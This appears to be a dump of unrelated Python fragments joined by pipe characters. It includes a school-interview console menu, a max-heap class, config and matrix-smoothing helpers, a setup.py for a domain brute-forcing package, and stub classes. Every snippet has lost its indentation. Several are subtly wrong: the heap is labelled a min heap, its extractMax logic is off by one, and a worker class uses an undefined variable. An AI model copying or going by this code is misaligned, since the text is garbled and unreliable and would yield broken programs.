firm_wealth = pd.DataFrame([{'id':f.unique_id, 'size':len(f.agents),'w':f.utility} for f in firms])
|
lis = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
lis2 = [1, 2, 3, 4, "yep"]
# print(lis[0])
num = int(input())
for element in lis:
if element <= num:
print(element)
print([output for output in lis if output <= num]) |
import os
from generator.MentorInterviewDateGenerator import MentorInterviewDateGenerator
from applicant_interview_details import interview_details
from build import BuildTable
from generator.InterviewGenerator import InterviewGenerator
from dao.ApplicantQueries import ApplicantQueries
from dao.InterviewQueries import InterviewQueries
from generator.ExampleDataGenerator import ExampleDataGenerator
from generator.ApplicantsGenerator import ApplicantsGenerator
from ui.InterviewPrinter import InterviewPrinter
def clear_sreen():
os.system('cls' if os.name == 'nt' else 'clear')
def main():
chosen_menu = 'q'
clear_sreen()
while chosen_menu != 0:
print("\n- - - School system - Main Menu - - -\n-------------------------------------")
print("1. I am an administrator")
print("2. I am a mentor")
print("3. I am an applicant")
print("0. Exit")
print("-------------------------------")
chosen_menu = int(input("Please choose a menu number: "))
if chosen_menu == 1:
clear_sreen()
chosen_administrator_menu = 'q'
while chosen_administrator_menu != 0:
print("\n- - - School system - Administrator Menu - - -\n-------------------------------------")
print("1. Create tables")
print("2. Generate data")
print("3. Generate applicants")
print("4. Generate interview date to applicants")
print("0. Exit")
print("-------------------------------------")
chosen_administrator_menu = int(input("Please choose an Administrator menu number: "))
if chosen_administrator_menu == 1:
try:
BuildTable()
print("Tables created succcessfully")
except:
print("I can't create tables")
elif chosen_administrator_menu == 2:
try:
ExampleDataGenerator.generate()
print("Data successfully generated and inserted")
except:
print("I can't Generate example data")
elif chosen_administrator_menu == 3:
try:
ApplicantsGenerator()
print("Applicants data successfully generated and inserted")
except:
print("I can't Generate applicants")
elif chosen_administrator_menu == 4:
try:
InterviewGenerator()
print("Interview dates successfully generated to applicants")
except:
print("Something went wrong. I can't generate interview dates to applicants")
elif chosen_administrator_menu == 0:
clear_sreen()
break
else:
print("Wrong menu number was given")
elif chosen_menu == 2:
clear_sreen()
chosen_mentor_menu = 'q'
while chosen_mentor_menu != 0:
print("\n- - - School system - Mentor Menu - - -\n-------------------------------------")
print("1. Interviews")
print("0. Exit")
print("-------------------------------------")
chosen_mentor_menu = int(input("Please choose a Mentor menu number: "))
if chosen_mentor_menu == 1:
mentor_id = int(input("Please tell me your mentor id: "))
try:
MentorInterviewDateGenerator(mentor_id)
except:
print("There is no mentor with that id")
elif chosen_mentor_menu == 0:
clear_sreen()
break
else:
print("Wrong menu number was given")
elif chosen_menu == 3:
clear_sreen()
chosen_applicant_menu = 'q'
while chosen_applicant_menu != 0:
print("\n- - - School system - Applicant Menu - - -\n-------------------------------------")
print("1. Interview details")
print("2. Status details")
print("3. School details")
print("0. Exit")
print("-------------------------------------")
chosen_applicant_menu = int(input("Please choose an Applicant menu number: "))
if chosen_applicant_menu == 1:
application_code = input("Please, enter your application code: ")
interviews = InterviewQueries.findInterviewsByApplicantCode(application_code)
InterviewPrinter.printList(interviews)
elif chosen_applicant_menu == 2:
application_code = input("Please, enter your application code: ")
try:
status = ApplicantQueries.findStatusByCode(application_code)
print("Your application status is", status)
except:
print("There is no application code like that in the database. Please try again")
elif chosen_applicant_menu == 3:
application_code = input("Please, enter your application code: ")
try:
school = ApplicantQueries.findSchoolByCode(application_code)
print("Your applied school is", school.city)
except:
print("There is no application code like that in the database. Please try again")
elif chosen_applicant_menu == 0:
clear_sreen()
break
else:
print("Wrong menu number was given")
elif chosen_menu == 0:
print("\n------------------------------------------------------------")
print("| Thanks for choosing Codeorgo Software! See you next time!|")
print("------------------------------------------------------------")
else:
print("Wrong menu number was given")
main()
|
# Python3 implementation of Min Heap
import sys
class MaxHeap:
def __init__(self, maxsize):
self.maxsize = maxsize
self.size = 0
self.Heap = [0]*(self.maxsize + 1)
self.Heap[0] = 1 * sys.maxsize
self.FRONT = 1
def parent(self, pos):
return pos//2
def leftChild(self, pos):
return 2 * pos
def rightChild(self, pos):
return (2 * pos) + 1
def isLeaf(self, pos):
if pos >= (self.size//2) and pos <= self.size:
return True
return False
# Function to swap two nodes of the heap
def insert(self, element):
if self.size >= self.maxsize :
return
self.size+= 1
self.Heap[self.size] = element
current = self.size
while self.Heap[current] > self.Heap[self.parent(current)]:
self.swap(current, self.parent(current))
current = self.parent(current)
def getMax(self):
return self.Heap[1]
def extractMax(self):
popped = self.Heap[self.FRONT]
self.Heap[self.FRONT] = self.Heap[self.size - 1]
self.Heap.pop(self.size - 1)
self.size -= 1
self.maxHeapify(self.FRONT)
return popped
def increaseKey(self, index,data):
if (self.Heap[index] > data):
return
self.Heap[index] = data
while (index != 0 and self.Heap[index] > self.Heap[self.parent(index)] ):
self.swap(index,self.parent(index))
index = self.parent(index);
def deleteKey(self, pos):
self.increaseKey(pos, sys.maxsize)
self.extractMax()
def maxHeapify(self, pos):
l = self.leftChild(pos);
r = self.rightChild(pos);
largest = pos;
if l < self.size and self.Heap[l] > self.Heap[pos]:
largest = l
if r < self.size and self.Heap[r] > self.Heap[largest]:
largest = r;
if largest != pos:
self.swap(pos, largest)
self.maxHeapify(largest)
def maxHeap(self):
for pos in range(self.size//2, 0, -1):
self.maxHeapify(pos)
def swap(self, fpos, spos):
self.Heap[fpos], self.Heap[spos] = self.Heap[spos], self.Heap[fpos]
def Print(self):
print(self.Heap)
for i in range(1, (self.size//2) + 1):
print(" PARENT : "+ str(self.Heap[i])+" LEFT CHILD : "+ str(self.Heap[2 * i])+" RIGHT CHILD : "+ str(self.Heap[2 * i + 1]))
def main():
def implemetation():
print('The maxHeap is ')
maxHeap = MaxHeap(14)
arr = [12, 10, 9, 8, 15, 1, 3, 4, 6, 5, 17, 20]
for i in arr:
maxHeap.insert(i)
maxHeap.Print()
print(maxHeap.getMax())
maxHeap.increaseKey(5, 10000)
maxHeap.Print()
print(maxHeap.getMax())
print(maxHeap.extractMax())
maxHeap.Print()
maxHeap.deleteKey(6)
print(" ")
maxHeap.Print()
def libraryfun():
#Using Library functions
from heapq import heapify, heappush, heappop
# Creating empty heap
heap = []
heapify(heap)
# Adding items to the heap using heappush function
heappush(heap, 10)
heappush(heap, 30)
heappush(heap, 20)
heappush(heap, 400)
# printing the value of minimum element
print("Head value of heap : "+str(heap[0]))
# printing the elements of the heap
print("The heap elements : ")
for i in heap:
print(i, end = ' ')
print("\n")
element = heappop(heap)
# printing the elements of the heap
print("The heap elements : ")
for i in heap:
print(i, end = ' ')
implemetation()
#libraryfun()
# Driver Code
if __name__ == "__main__":
main() |
# -*- coding: utf-8 -*-
from os.path import expanduser
import configparser
import logging
class Config:
configs = {}
def __init__(self,cfg):
home = expanduser("~")
cfg = home + '/' + cfg
#logging.info("Reading config from : " + cfg)
config = configparser.ConfigParser()
config.read(cfg, encoding='UTF-8')
for section in config.sections():
options = config.options(section)
for option in options:
try:
value = config.get(section,option)
if value == 'True' or value == 'true':
value = True
elif value == 'False' or value == 'false':
value = False
self.configs[section + '_' + option] = value
except:
self.configs[section + '_' + option] = None
|
from __future__ import print_function
import copy
def wprint(a,size1,size2,f):
for i in range(size1):
for j in range(size2):
if j == size2 - 1:
f.write('%1.10f' % a[j, i]),
else:
f.write('%1.10f ' % a[j, i]),
f.write('\n')
def bprint(a,size,f):
for i in range(size):
f.write('%1.10f\n' % a[i])
def smoothing(a,size1,size2,sh,center,rad1):
s=copy.deepcopy(a)
rad2 = (1. - center - 4. * rad1)/4.
for i in range(size1):
for j in range(size2):
s[i][j]=0.
s1=0.
s2=0.
k1=0.
k2=0.
for di in range(max(i-sh,0), min(i+sh,size1-1)+1):
for dj in range(max(j-sh,0), min(j+sh,size2-1)+1):
n = (min(i+sh,size1-1) - max(i-sh,0) +1) * (min(j+sh,size2-1) - max(j-sh,0)+1)
if (a[di][dj]>-2000):
if (abs(i-di)+abs(j-dj)) == 0:
s[i][j]=a[di][dj]
else:
if (abs(i-di)+abs(j-dj)) == 1:
s1+=a[di][dj]
k1+=1.
else:
if (abs(i-di)+abs(j-dj)) == 2:
s2+=a[di][dj]
k2+=1.
if k1==0: k1=1
if k2==0: k2=1
s[i][j] = s[i][j]*center + s1*rad1*4./k1 + s2*rad2*4/k2
# s[0][0]=center*a[0][0]+rad1*a[0][1]*2+rad1*a[1][0]*2+rad2*a[1][1]*4
# s[size1-1][0]=center*a[size1-1][0]+rad1*a[size1-1][1]*2+rad1*a[size1-2][0]*2+rad2*a[size1-2][1]*4
# s[0][size2-1]=center*a[0][size2-1]+rad1*a[1][size2-1]*2+rad1*a[0][size2-2]*2+rad2*a[1][size2-2]*4
# s[size1-1][size2-1]=center*a[size1-1][size2-1]+rad1*a[size1-2][size2-1]*2+rad1*a[size1-1][size2-2]*2+rad2*a[size1-2][size2-2]*4
# print(rad1,rad2)
# for i in range(1,size1-1):
# s[i][0] = center * a[i][0] + rad1 * a[i][1]*4./3. + rad1 * a[i - 1][0]*4./3. + rad1 * a[i + 1][0]*4./3. + rad2 * a[i - 1][1]*2 + rad2 * a[i + 1][1]*2
# s[i][size2-1] = center * a[i][size2-1] + rad1 * a[i][size2-2]*4./3. + rad1 * a[i - 1][size2-1]*4./3. + rad1 * a[i + 1][size2-1]*4./3. + rad2 * a[i - 1][size2-2]*2 + rad2 * a[i + 1][size2-2]*2
# for i in range(1,size2-1):
# s[0][i] = center * a[0][i] + rad1 * a[1][i]*4./3. + rad1 * a[0][i - 1]*4./3. + rad1 * a[0][i + 1]*4./3. + rad2 * a[1][i - 1]*2+ rad2 * a[1][i + 1]*2
# s[size1-1][i] = center * a[size1-1][i] + rad1 * a[size1-2][i]*4./3. + rad1 * a[size1-1][i - 1]*4./3. + rad1 * a[size1-1][i + 1]*4./3. + rad2 * a[size1-2][i - 1]*2 + rad2 * a[size1-2][i + 1]*2
return s
def wread(fa,size1,size2):
a=[]
for i in range(size1):
a.append(fa.readline().split())
for j in range(size2):
a[i][j]=float(a[i][j])
return a
def bread(f,size):
bb=f.read().split()
for i in range(size):
bb[i]=float(bb[i])
return bb
def accuracyprint(a,size1,size2,f):
for i in range(size1):
for j in range(size2):
if j == size2 - 1:
f.write('%1.10f' % a[i][j])
else:
f.write('%1.10f,' % a[i][j])
f.write('\n')
|
from setuptools import setup, find_packages
VERSIONFILE = open("VERSION").read()
setup(name='simplydomain',
version=VERSIONFILE,
description='simplydomain is a very basic framework to automate domain brute forcing.',
url='http://github.com/SimplySecurity/simplydomain-pkg',
author='Alexander Rymdeko-Harvey',
author_email='a.rymdekoharvey@obscuritylabs.com',
license='BSD 3.0',
packages=[
'simplydomain',
'simplydomain.src',
'simplydomain.src.dynamic_modules',
'simplydomain.src.static_modules',
'simplydomain.tests'
],
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7'
],
install_requires=[
'aiodns',
'aiohttp',
'beautifulsoup4',
'crtsh',
'dnsdumpster',
'fake_useragent',
'json2xml',
'requests',
'setuptools',
'termcolor',
'tqdm',
'uvloop',
'validators',
'click'
],
scripts=[
'simplydomain/bin/simply_domain.py'
],
include_package_data=True,
zip_safe=False)
|
FILLFORM= "Please fill out the form !"
SUCCESSFULLOGIN="Logged in successfully !"
SUCCESSFULLLOGOUT="Logged Out successfully"
ACCOUNTEXIST="Account already exists !"
INVALIDEMAIL="Invalid email address !"
INVALIDUSERNAME="Username must contain only characters and numbers !"
REDIRECTTOLOGINPAGE="Redirecting to login page"
REDIRECTTOEXPERIENCEPAGE="Redirecting to experience page"
SUCCESSFULLREGISTER="You have successfully registered !" |
class WorkerBase():
def __init__(self, master, task_id):
self.task_server = task_server
self.master = master
pass
def execute(self, ):
pass
def output(self):
pass
class Mapper(WorkerBase):
pass
class Reducer(WorkerBase):
def on_receive_data(self):
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.